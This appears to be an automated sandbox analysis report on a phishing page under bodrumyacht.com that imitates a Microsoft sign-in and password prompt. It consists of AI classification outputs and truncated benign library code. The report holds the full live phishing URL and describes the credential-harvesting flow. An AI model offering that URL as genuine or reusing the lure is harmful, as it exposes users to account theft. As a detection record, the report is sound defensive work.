| URL: https://bodrumyacht.com/4765445b-32c6-49b0-83e6-1d93765276caF1BCfXGgq2yXRVugqONJmWbK2Q3azh94j6PPQkwtRRBDiMVFsDmHo_kwff9Gq6HTIvrBenIBhLDRgAdX3oG/638726411371134980.NjU2MjE0ZWMtZmYzYy00MWRmLWI4M/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false,
"page_classification": "unknown"
} |
 |
| URL: https://bodrumyacht.com/4765445b-32c6-49b0-83e6-1d93765276caF1BCfXGgq2yXRVugqONJmWbK2Q3azh94j6PPQkwtRRBDiMVFsDmHo_kwff9Gq6HTIvrBenIBhLDRgAdX3oG/638726411371134980.NjU2MjE0ZWMtZmYzYy00MWRmLWI4M/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false,
"page_classification": "unknown"
} |
 |
| URL: https://bodrumyacht.com/4765445b-32c6-49b0-83e6-1d93765276caF1BCfXGgq2yXRVugqONJmWbK2Q3azh94j6PPQkwtRRBDiMVFsDmHo_kwff9Gq6HTIvrBenIBhLDRgAdX3oG/638726411371134980.NjU2MjE0ZWMtZmYzYy00MWRmLWI4M/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false,
"page_classification": "unknown"
} |
 |
| URL: https://bodrumyacht.com/4765445b-32c6-49b0-83e6-1d93765276caF1BCfXGgq2yXRVugqONJmWbK2Q3azh94j6PPQkwtRRBDiMVFsDmHo_kwff9Gq6HTIvrBenIBhLDRgAdX3oG/638726411371134980.NjU2MjE0ZWMtZmYzYy00MWRmLWI4M/ Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://code.jquery.com/jquery-3.6.0.min.js... Model: Joe Sandbox AI | ```json
{
"risk_score": 1,
"reasoning": "The provided JavaScript snippet is a part of the jQuery library, which is a widely used and reputable open-source library for DOM manipulation and event handling. It does not exhibit any high-risk behaviors such as dynamic code execution or data exfiltration. The script is not obfuscated and does not interact with external domains in a suspicious manner. Therefore, it is considered low risk."
} |
/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.6.0",S=function(e,t){return new S.fn.init(e,t)};function p(e){var t=!!e&&"length"in e&&e.length,n=w(e);return!m(e)&&!x(e)&&("array"===n||0===t||"number"==typeof t&&0<t&&t-1 in e)}S.fn=S.prototype={jquery:f,constructor:S,length:0,toArray:function(){return s.call(this)},get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(s.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:u,sort:t.sort,splice:t.splice},S.extend=S.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||m(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(S.isPlainObject(r)||(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i||S.isPlainObject(n)?n:{},i=!1,a[t]=S.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},S.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(p(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},makeArray:function(e,t){var n=t||[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,i,o=0,a=[];if(p(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&a.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&a.push(i);return g(a)},guid:1,support:y}),"function"==typeof Symbol&&(S.fn[Symbol.iterator]=t[Symbol.iterator]),S.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){n["[object "+t+"]"]=t.toLowerCase()});var d=function(n){var e,d,b,o,i,h,f,g,w,u,l,T,C,a,E,v,s,c,y,S="s |
| URL: https://bodrumyacht.com/4765445b-32c6-49b0-83e6-1d93765276caF1BCfXGgq2yXRVugqONJmWbK2Q3azh94j6PPQkwtRRBDiMVFsDmHo_kwff9Gq6HTIvrBenIBhLDRgAdX3oG/638726411371134980.NjU2MjE0ZWMtZmYzYy00MWRmLWI4M/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign in",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email, phone, or Skype"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false,
"page_classification": "software download portal"
} |
 |
| URL: https://challenges.cloudflare.com/turnstile/v0/g/6... Model: Joe Sandbox AI | ```json
{
"risk_score": 1,
"reasoning": "The script does not exhibit any high-risk or moderate-risk behaviors. It primarily consists of utility functions and error handling, with no indication of malicious intent or data exfiltration. The code appears to be part of a larger library or framework, possibly for handling asynchronous operations or managing errors."
} |
"use strict";(function(){function Bt(e,t,a,o,c,l,g){try{var h=e[l](g),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function jt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function g(s){Bt(l,o,c,g,h,"next",s)}function h(s){Bt(l,o,c,g,h,"throw",s)}g(void 0)})}}function D(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):D(e,t)}function Ue(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function De(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Ue(e,c,a[c])})}return e}function Sr(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function it(e,t){return t=t!=null?t:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(t)):Sr(Object(t)).forEach(function(a){Object.defineProperty(e,a,Object.getOwnPropertyDescriptor(t,a))}),e}function qt(e){if(Array.isArray(e))return e}function zt(e,t){var a=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(a!=null){var o=[],c=!0,l=!1,g,h;try{for(a=a.call(e);!(c=(g=a.next()).done)&&(o.push(g.value),!(t&&o.length===t));c=!0);}catch(s){l=!0,h=s}finally{try{!c&&a.return!=null&&a.return()}finally{if(l)throw h}}return o}}function Gt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function ot(e,t){(t==null||t>e.length)&&(t=e.length);for(var a=0,o=new Array(t);a<t;a++)o[a]=e[a];return o}function Xt(e,t){if(e){if(typeof e=="string")return ot(e,t);var a=Object.prototype.toString.call(e).slice(8,-1);if(a==="Object"&&e.constructor&&(a=e.constructor.name),a==="Map"||a==="Set")return Array.from(a);if(a==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(a))return ot(e,t)}}function Se(e,t){return qt(e)||zt(e,t)||Xt(e,t)||Gt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ve(e,t){var a={label:0,sent:function(){if(l[0]&1)throw l[1];return l[1]},trys:[],ops:[]},o,c,l,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(_){return s([p,_])}}function s(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(a=0)),a;)try{if(o=1,c&&(l=p[0]&2?c.return:p[0]?c.throw||((l=c.return)&&l.call(c),0):c.next)&&!(l=l.call(c,p[1])).done)return l;switch(c=0,l&&(p=[p[0]&2,l.value]),p[0]){case 0:case 1:l=p;break;case 4:return a.label++,{value:p[1],done:!1};case 5:a.label++,c=p[1],p=[0];continue;case 7:p=a.ops.pop(),a.trys.pop();continue;default:if(l=a.trys,!(l=l.length>0&&l[l.length-1])&&(p[0]===6||p[0]===2)){a=0;continue}if(p[0]===3&&(!l||p[1]>l[0]&&p[1]<l[3])){a.label=p[1];break}if(p[0]===6&&a.label<l[1]){a.label=l[1],l=p;break}if(l&&a.label<l[2]){a.label=l[2],a.ops.push(p);break}l[2]&&a.ops.pop(),a.trys.pop();continue}p=t.call(e,a)}catch(_){p=[6,_],c=0}finally{o=l=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Yt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Qt=300020;var Pe=300030;var We=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
| URL: https://bodrumyacht.com/4765445b-32c6-49b0-83e6-1d93765276caF1BCfXGgq2yXRVugqONJmWbK2Q3azh94j6PPQkwtRRBDiMVFsDmHo_kwff9Gq6HTIvrBenIBhLDRgAdX3oG/638726411371134980.NjU2MjE0ZWMtZmYzYy00MWRmLWI4M/ Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: https://bodrumyacht.com/4765445b-32c6-49b0-83e6-1d93765276caF1BCfXGgq2yXRVugqONJmWbK2Q3azh94j6PPQkwtRRBDiMVFsDmHo_kwff9Gq6HTIvrBenIBhLDRgAdX3oG/638726411371134980.NjU2MjE0ZWMtZmYzYy00MWRmLWI4M/ Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: https://bodrumyacht.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false,
"reasoning": "This appears to be a legitimate business domain for yacht services in Bodrum. It uses a standard .com TLD, has no suspicious elements, and follows normal URL formatting patterns."
} |
URL: https://bodrumyacht.com |
| URL: https://bodrumyacht.com/4765445b-32c6-49b0-83e6-1d93765276caF1BCfXGgq2yXRVugqONJmWbK2Q3azh94j6PPQkwtRRBDiMVFsDmHo_kwff9Gq6HTIvrBenIBhLDRgAdX3oG/638726411371134980.NjU2MjE0ZWMtZmYzYy00MWRmLWI4M/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4... Model: Joe Sandbox AI | ```json
{
"risk_score": 1,
"reasoning": "The script appears to be a cryptographic library, likely CryptoJS, which is a well-known library for cryptographic operations in JavaScript. There are no high-risk indicators such as dynamic code execution or data exfiltration. The use of cryptographic functions and random number generation is typical for such libraries. No interactions with external domains or obfuscated code are present, indicating a low risk."
} |
!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null,e};function n(){}var e={},o=e.lib={},s=o.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();return t.init.apply(t,arguments),t},init:function(){},mixIn:function(t){for(var e in t)t.hasOwnProperty(e)&&(this[e]=t[e]);t.hasOwnProperty("toString")&&(this.toString=t.toString)},clone:function(){return this.init.prototype.extend(this)}},f=o.WordArray=s.extend({init:function(t,e){t=this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||a).stringify(this)},concat:function(t){var e=this.words,r=t.words,i=this.sigBytes,n=t.sigBytes;if(this.clamp(),i%4)for(var o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:function(){var t=s.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(i());return new f.init(e,t)}}),c=e.enc={},a=c.Hex={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push((o>>>4).toString(16)),i.push((15&o).toString(16))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i+=2)r[i>>>3]|=parseInt(t.substr(i,2),16)<<24-i%8*4;return new f.init(r,e/2)}},h=c.Latin1={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push(String.fromCharCode(o))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i++)r[i>>>2]|=(255&t.charCodeAt(i))<<24-i%4*8;return new f.init(r,e)}},d=c.Utf8={stringify:function(t){try{return decodeURIComponent(escape(h.stringify(t)))}catch(t){throw new Error("Malformed UTF-8 data")}},parse:function(t){return h.parse(unescape(encodeURIComponent(t)))}},u=o.BufferedBlockAlgorithm=s.extend({reset:function(){this._data=new f.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=d.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProcessBlock(i,h);e=i.splice(0,c),r.sigBytes-=a}return new f.init(e,a)},clone:function(){var t=s.clone.call(this);return t._data=this._data.clone(),t},_minBufferSize:0}),p=(o.Hasher=u.extend({cfg:s.extend(),init:function(t){this.cfg=this.cfg.extend(t),this.reset()},reset:function(){u.reset.call(this),this._doReset()},update:function(t){return this._append(t),this._process(),this},finalize:function(t){return t&&this._append(t),this._doFinalize()},blockSize:16,_createHelper:function(r){return function(t,e){return new r.init(e).finalize(t)}},_createHmacHelper:function(r){return function(t,e){return new p.HMA |
| URL: https://bodrumyacht.com/4765445b-32c6-49b0-83e6-1d93765276caF1BCfXGgq2yXRVugqONJmWbK2Q3azh94j6PPQkwtRRBDiMVFsDmHo_kwff9Gq6HTIvrBenIBhLDRgAdX3oG/638726411371134980.NjU2MjE0ZWMtZmYzYy00MWRmLWI4M/ Model: Joe Sandbox AI | ```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'bodrumyacht.com' does not match the legitimate domain for Microsoft.", "The URL 'bodrumyacht.com' appears unrelated to Microsoft and suggests a focus on yachting or tourism, which is not associated with Microsoft's business.", "The presence of input fields such as 'Email, phone, or Skype' is typical for Microsoft services, but the domain does not match, raising suspicion.", "There are no indicators that 'bodrumyacht.com' is a trusted service provider for Microsoft." ], "riskscore": 9}
Google indexed: True |
URL: bodrumyacht.com
Brands: Microsoft
Input Fields: Email, phone, or Skype |
| URL: https://bodrumyacht.com/4765445b-32c6-49b0-83e6-1d93765276caF1BCfXGgq2yXRVugqONJmWbK2Q3azh94j6PPQkwtRRBDiMVFsDmHo_kwff9Gq6HTIvrBenIBhLDRgAdX3oG/638726411371134980.NjU2MjE0ZWMtZmYzYy00MWRmLWI4M/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign in",
"prominent_button_name": "Next",
"text_input_field_labels": [
"test@test.com"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false,
"page_classification": "software download portal"
} |
 |
| URL: https://bodrumyacht.com/4765445b-32c6-49b0-83e6-1d93765276caF1BCfXGgq2yXRVugqONJmWbK2Q3azh94j6PPQkwtRRBDiMVFsDmHo_kwff9Gq6HTIvrBenIBhLDRgAdX3oG/638726411371134980.NjU2MjE0ZWMtZmYzYy00MWRmLWI4M/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://bodrumyacht.com/4765445b-32c6-49b0-83e6-1d93765276caF1BCfXGgq2yXRVugqONJmWbK2Q3azh94j6PPQkwtRRBDiMVFsDmHo_kwff9Gq6HTIvrBenIBhLDRgAdX3oG/638726411371134980.NjU2MjE0ZWMtZmYzYy00MWRmLWI4M/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Your account or password is incorrect. If you can't re-member your password, reset it now.",
"prominent_button_name": "Sign in",
"text_input_field_labels": [
"Password"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": true,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false,
"page_classification": "software download portal"
} |
 |
| URL: https://bodrumyacht.com/4765445b-32c6-49b0-83e6-1d93765276caF1BCfXGgq2yXRVugqONJmWbK2Q3azh94j6PPQkwtRRBDiMVFsDmHo_kwff9Gq6HTIvrBenIBhLDRgAdX3oG/638726411371134980.NjU2MjE0ZWMtZmYzYy00MWRmLWI4M/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
Edit tour
WINWORD.EXE (PID: 6820 cmdline: 
chrome.exe (PID: 6316 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node